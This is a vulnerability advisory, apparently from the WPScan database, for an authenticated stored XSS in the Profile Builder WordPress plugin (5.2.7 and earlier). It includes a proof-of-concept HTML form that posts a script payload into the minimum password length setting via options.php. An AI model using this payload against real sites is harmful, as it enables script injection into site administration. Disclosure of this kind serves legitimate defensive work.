Profile Builder <= 5.2.7 - Authenticated Stored Cross-Site Scripting (XSS)



Description
Stored Cross-Site Scripting (XSS) in field minimum password length.
Proof of Concept
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp/wp-admin/options.php" method="POST">
      <input type="hidden" name="option&#95;page" value="wppb&#95;general&#95;settings" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="&#95;wpnonce" value="a37f914f93" />
      <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;admin&#46;php&#63;page&#61;profile&#45;builder&#45;general&#45;settings" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;extraFieldsLayout&#93;" value="default" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;emailConfirmation&#93;" value="no" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;activationLandingPage&#93;" value="" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;loginWith&#93;" value="usernameemail" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;minimum&#95;password&#95;length&#93;" value="8&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;minimum&#95;password&#95;strength&#93;" value="strong" />
      <input type="hidden" name="action" value="update" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset/1607426/profile-builder

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter f3ci
Submitter Website https://spentera.id
Views 6224
Verified No
WPVDB ID 8776

Timeline

Publicly Published 2017-03-10 (over 3 years ago)
Added 2017-03-15 (over 3 years ago)
Last Updated 2019-11-01 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin